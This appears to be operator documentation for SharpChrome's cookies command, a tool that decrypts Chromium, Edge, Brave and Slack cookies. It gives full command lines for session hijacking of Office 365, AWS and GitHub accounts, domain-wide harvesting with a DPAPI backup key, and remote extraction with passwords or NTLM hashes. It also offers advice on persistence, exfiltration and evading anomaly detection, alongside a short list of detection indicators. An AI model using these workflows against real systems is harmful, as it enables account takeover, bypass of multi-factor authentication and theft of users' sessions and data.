Skip to main content

Overview

The cookies command searches for Chromium-based browser ‘Cookies’ files and decrypts cookie values stored in SQLite databases. This enables session hijacking by extracting authentication cookies that can be imported into another browser to impersonate users without requiring passwords. SharpChrome’s lockless SQLite implementation allows cookie extraction while the target browser is still running, making it ideal for stealthy credential harvesting operations. The command supports filtering by cookie name or URL using regex patterns, and can output in multiple formats including JSON for easy import.

Key Features

  • Extracts encrypted cookies from Chromium browsers
  • Supports session hijacking via cookie import
  • Regex filtering by cookie name and URL
  • JSON export compatible with EditThisCookie extension
  • Lockless database access (browser stays open)
  • Filters expired cookies automatically
  • Chrome 80+ AES state key support
  • Remote cookie extraction capability

Basic Usage

# Decrypt all cookies for current user
SharpChrome.exe cookies

# Decrypt cookies from Edge browser
SharpChrome.exe cookies /browser:edge

# Decrypt cookies from Brave browser
SharpChrome.exe cookies /browser:brave

Command Arguments

  • Decryption
  • Targeting
  • Output
  • Filtering

Decryption Arguments

/unprotect
flag
Force use of CryptUnprotectData() for decryption. Default behavior in unprivileged contexts. Must be run from the user context that saved the cookies.
/pvk
string
Use a DPAPI domain backup key to decrypt user masterkeys, then decrypt cookies.Accepts two formats:
  • Base64-encoded key: /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAACU...
  • File path: /pvk:key.pvk
Requires domain admin rights to obtain the backup key via the backupkey command.
{GUID}:SHA1
string
One or more DPAPI masterkey GUID:SHA1 mappings for decryption.
SharpChrome.exe cookies {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd...
Extract these with Mimikatz: sekurlsa::dpapi
/mkfile
file
File containing one or more GUID:SHA1 masterkey mappings (one per line).
SharpChrome.exe cookies /mkfile:masterkeys.txt
/password
string
Decrypt target user’s masterkeys using plaintext password. Works remotely.
SharpChrome.exe cookies /password:Password123!
/ntlm
string
Decrypt target user’s masterkeys using NTLM hash. Works remotely.
SharpChrome.exe cookies /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
/prekey
string
Decrypt target user’s masterkeys using DPAPI prekey (domain or local SHA1).
  • Domain users: Use dpapi field from Mimikatz sekurlsa::msv
  • Local users: Use sha1 field from Mimikatz sekurlsa::msv
/rpc
flag
Decrypt target user’s masterkeys by asking the domain controller via RPC.
/statekey
string
Provide a pre-decrypted AES state key for Chrome 80+ cookie decryption.
SharpChrome.exe cookies /statekey:3F7A8B2C9D1E4F6A8B2C9D1E4F6A8B2C
Obtain using the statekeys command first.

Chrome 80+ State Key Encryption

Starting with Chrome 80, cookies use AES encryption via a state key instead of direct DPAPI encryption.

State Key Process

  1. State Key Storage: AES key stored in Local State file
  2. DPAPI Protection: State key encrypted with DPAPI
  3. Cookie Encryption: Cookies encrypted with AES state key

Automatic Handling

SharpChrome automatically handles Chrome 80+ encryption: 
# Automatically decrypts state key and uses it
SharpChrome.exe cookies /pvk:key.pvk

Manual State Key Usage

For better control, extract state keys separately: 
# Step 1: Extract state keys
SharpChrome.exe statekeys /pvk:key.pvk

# Step 2: Use state key for cookie decryption
SharpChrome.exe cookies /statekey:EXTRACTED_KEY_HERE

Supported Browsers

Google Chrome

Default target. Extracts cookies from all Chrome profiles.Location: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies

Microsoft Edge

Chromium-based Edge. Use /browser:edge.Location: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Cookies

Brave Browser

Privacy-focused browser. Use /browser:brave.Location: %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\Cookies

Slack Desktop

Slack desktop app. Use /browser:slack.Location: %APPDATA%\Slack\Cookies
Cookie hijacking involves stealing authenticated session cookies from a target user and importing them into your browser. This bypasses the need for passwords and multi-factor authentication in many cases, as the session is already established.

Step-by-Step Workflow

1

Extract Cookies

Extract cookies from the target system in JSON format:
# Extract all cookies from Office 365
SharpChrome.exe cookies /format:json /url:".*office\.com.*" /setneverexpire

# Extract cookies from GitHub
SharpChrome.exe cookies /format:json /url:".*github\.com.*" /setneverexpire

# Save to file
SharpChrome.exe cookies /format:json /url:".*portal.*" /consoleoutfile:cookies.json
2

Install EditThisCookie

Install the EditThisCookie extension in your Chrome browser.This extension allows easy cookie import/export and is compatible with SharpChrome’s JSON output.
3

Import Cookies

In your browser:
  1. Navigate to the target domain (e.g., portal.office.com)
  2. Click the EditThisCookie extension icon
  3. Click the import icon (upload symbol)
  4. Paste the JSON output from SharpChrome
  5. Click “Import” to load the cookies
4

Access the Session

Refresh the page. You should now be authenticated as the target user without entering credentials.Important: The session remains active as long as:
  • The cookies haven’t expired (use /setneverexpire)
  • The target user hasn’t logged out
  • The service doesn’t detect anomalies (different IP, user-agent, etc.)

Office 365 / Azure

SharpChrome.exe cookies /format:json /url:".*(office|azure|microsoft)\.com.*" /setneverexpire
Access email, OneDrive, Teams, and Azure portal

AWS Console

SharpChrome.exe cookies /format:json /url:".*aws\.amazon\.com.*" /setneverexpire
Access AWS console with user’s permissions

GitHub / GitLab

SharpChrome.exe cookies /format:json /url:".*(github|gitlab)\.com.*" /setneverexpire
Access repositories and code with user’s access

Corporate VPN / Portal

SharpChrome.exe cookies /format:json /url:".*portal\.company\.com.*" /setneverexpire
Access internal company resources

Session Persistence Strategies

Maintaining Long-Term Access:
  1. Use /setneverexpire to extend cookie lifetimes
  2. Extract cookies periodically to refresh sessions
  3. Use cookies before the user logs out
  4. Consider exfiltrating both cookies and credentials
  5. Monitor for session invalidation events

Example Workflows

Extract all cookies for the current user: 
# CSV format (default)
SharpChrome.exe cookies

# Table format for readability
SharpChrome.exe cookies /format:table

# Include expired cookies
SharpChrome.exe cookies /showall

Scenario 2: Targeted Session Hijacking

Extract specific cookies for session hijacking: 
# Step 1: Extract Office 365 cookies in JSON format
SharpChrome.exe cookies /format:json /url:".*office\.com.*" /setneverexpire /consoleoutfile:o365.json

# Step 2: Import into EditThisCookie
# (Copy JSON from o365.json and import via extension)

# Step 3: Navigate to https://portal.office.com
# You're now logged in as the target user
As domain admin, harvest cookies from all domain workstations: 
# Step 1: Get domain backup key
SharpChrome.exe backupkey /server:DC01 /file:backup.pvk

# Step 2: Extract cookies from local machine (all users)
SharpChrome.exe cookies /pvk:backup.pvk /format:json /url:".*company\.com.*" /consoleoutfile:local_cookies.json

# Step 3: Extract from remote workstations
SharpChrome.exe cookies /server:WORKSTATION01 /pvk:backup.pvk /format:json /url:".*company\.com.*" /consoleoutfile:wks01_cookies.json
SharpChrome.exe cookies /server:WORKSTATION02 /pvk:backup.pvk /format:json /url:".*company\.com.*" /consoleoutfile:wks02_cookies.json
Extract specific cookies using regex patterns: 
# Extract only session cookies
SharpChrome.exe cookies /cookie:"session.*" /format:json

# Extract authentication tokens
SharpChrome.exe cookies /cookie:".*token.*" /url:".*api\..*"

# Extract cookies from multiple cloud providers
SharpChrome.exe cookies /url:".*(aws|azure|gcp).*" /format:json /setneverexpire
Extract cookies from remote systems: 
# Using password authentication
SharpChrome.exe cookies /server:WORKSTATION03 /password:Password123! /format:json /url:".*"

# Using NTLM hash
SharpChrome.exe cookies /server:WORKSTATION03 /ntlm:8846F7EAEE8FB117AD06BDD830B7586C /format:json

# Using domain backup key
SharpChrome.exe cookies /server:WORKSTATION03 /pvk:backup.pvk /format:json
Extract cookies from all Chromium-based browsers: 
# Chrome
SharpChrome.exe cookies /pvk:backup.pvk /format:json /consoleoutfile:chrome_cookies.json

# Edge
SharpChrome.exe cookies /browser:edge /pvk:backup.pvk /format:json /consoleoutfile:edge_cookies.json

# Brave
SharpChrome.exe cookies /browser:brave /pvk:backup.pvk /format:json /consoleoutfile:brave_cookies.json

# Slack
SharpChrome.exe cookies /browser:slack /pvk:backup.pvk /format:json /consoleoutfile:slack_cookies.json

Example Output

CSV Format (Default)

Host,Name,Value,Path,Expires,Secure,HttpOnly
.github.com,_gh_sess,QnBfvL5kNxZp7vK9%2B...,/,2024-12-31 23:59:59,True,True
.office.com,.AspNet.Cookies,CfDJ8Abc123...,/,2024-12-31 23:59:59,True,True
.aws.amazon.com,aws-userInfo,eyJhbGciOiJIUzI1...,/,2024-12-31 23:59:59,True,False

Table Format

┌────────────────────┬───────────────────┬─────────────────────────┬────────┬─────────────────────┬────────┬──────────┐
│ Host               │ Name              │ Value                   │ Path   │ Expires             │ Secure │ HttpOnly │
├────────────────────┼───────────────────┼─────────────────────────┼────────┼─────────────────────┼────────┼──────────┤
│ .github.com        │ _gh_sess          │ QnBfvL5kNxZp7vK9%2B...  │ /      │ 2024-12-31 23:59:59 │ True   │ True     │
│ .office.com        │ .AspNet.Cookies   │ CfDJ8Abc123...          │ /      │ 2024-12-31 23:59:59 │ True   │ True     │
│ .aws.amazon.com    │ aws-userInfo      │ eyJhbGciOiJIUzI1...     │ /      │ 2024-12-31 23:59:59 │ True   │ False    │
└────────────────────┴───────────────────┴─────────────────────────┴────────┴─────────────────────┴────────┴──────────┘

JSON Format (EditThisCookie Compatible)

[
  {
    "domain": ".github.com",
    "expirationDate": 1735689599,
    "hostOnly": false,
    "httpOnly": true,
    "name": "_gh_sess",
    "path": "/",
    "sameSite": "no_restriction",
    "secure": true,
    "session": false,
    "storeId": "0",
    "value": "QnBfvL5kNxZp7vK9%2B..."
  },
  {
    "domain": ".office.com",
    "expirationDate": 1735689599,
    "hostOnly": false,
    "httpOnly": true,
    "name": ".AspNet.Cookies",
    "path": "/",
    "sameSite": "no_restriction",
    "secure": true,
    "session": false,
    "storeId": "0",
    "value": "CfDJ8Abc123..."
  }
]

Detection Considerations

EDR/AV Detection Vectors

  1. Process Activity
    • SharpChrome.exe accessing Cookies SQLite databases
    • Mass cookie file enumeration across user profiles
    • Unusual SQLite database operations
  2. File Access Patterns
    • Reading Cookies files from multiple user profiles
    • Accessing Local State files for state keys
    • Lockless database access to open Cookies files
  3. Network Activity
    • Remote file access to UNC paths for cookie databases
    • SMB connections to multiple workstations
    • Bulk cookie exfiltration over network
  4. Behavioral Indicators
    • Rapid enumeration of browser profile directories
    • Simultaneous access to multiple browsers’ cookie stores
    • Cookie export to JSON files

OPSEC Recommendations

Defensive Awareness Points:
  • Cookie extraction is highly detectable if EDR monitors file access
  • Remote extraction generates SMB traffic to Admin$ shares
  • JSON export creates suspicious file artifacts
  • Session hijacking may trigger anomaly detection (IP changes, geolocation)
  • Use targeted filtering to minimize noise
  • Exfiltrate only necessary cookies, not full databases
  • Consider timing attacks during normal business hours

Anomaly Detection

Many enterprise applications detect session anomalies:
  • IP Address Changes: Session used from different location
  • User-Agent Strings: Different browser/OS detected
  • Geolocation: Login from impossible travel location
  • Device Fingerprinting: Device characteristics don’t match
  • Behavioral Analytics: Usage patterns differ from normal
Reducing Anomaly Detection:
  1. Use cookies from the same network/IP range
  2. Match user-agent strings to the target’s browser
  3. Use VPN/proxy matching target’s location
  4. Time usage during target’s normal active hours
  5. Mimic target’s typical behavior patterns

SharpChrome Logins

Extract saved login credentials from browsers

SharpChrome State Keys

Extract AES state keys for Chrome 80+ decryption

Backup Key Retrieval

Retrieve domain DPAPI backup key from DC

SharpChrome Overview

Complete SharpChrome documentation

Tips and Troubleshooting

Common Issues

Possible causes:
  • Browser hasn’t saved any cookies
  • Running as wrong user (cookies are user-specific)
  • All cookies are expired (default filters them out)
  • Chrome 80+ requires state key
Solutions:
  • Verify Cookies file exists and contains data
  • Run as the user who owns the cookies
  • Use /showall to include expired cookies
  • Extract and use state key for Chrome 80+
Possible causes:
  • Cookies expired before use
  • Service detects session anomalies
  • Additional security tokens required
  • Session invalidated by original user
Solutions:
  • Use /setneverexpire when exporting
  • Extract fresh cookies just before use
  • Match IP/user-agent to avoid detection
  • Check if MFA or device trust is required
Possible causes:
  • JSON format malformed
  • Wrong domain for cookie import
  • Browser extension not installed
Solutions:
  • Validate JSON syntax
  • Navigate to correct domain first
  • Install EditThisCookie extension
  • Try importing cookies one at a time
Possible causes:
  • No administrative access to remote system
  • Firewall blocking SMB
  • Missing decryption method
Solutions:
  • Verify local admin rights on target
  • Check SMB (port 445) connectivity
  • Always use /pvk or /password with /server

Best Practices

Operational Best Practices:
  1. Targeted Extraction: Use regex filters to extract only needed cookies
  2. JSON Export: Always use /format:json with /setneverexpire for hijacking
  3. Fresh Cookies: Extract cookies as close to usage time as possible
  4. Stealth: Avoid mass extraction; target specific users/sites
  5. Logging: Use /consoleoutfile to save output for later analysis
  6. Backup Keys: Use domain backup key for maximum coverage
  7. Testing: Test cookie import in isolated environment first

Performance Notes

  • Local extraction: Completes in seconds
  • Remote extraction: Depends on network speed and user count
  • Lockless access: Browser remains functional during extraction
  • Large cookie databases: May take longer to process and filter

Additional Resources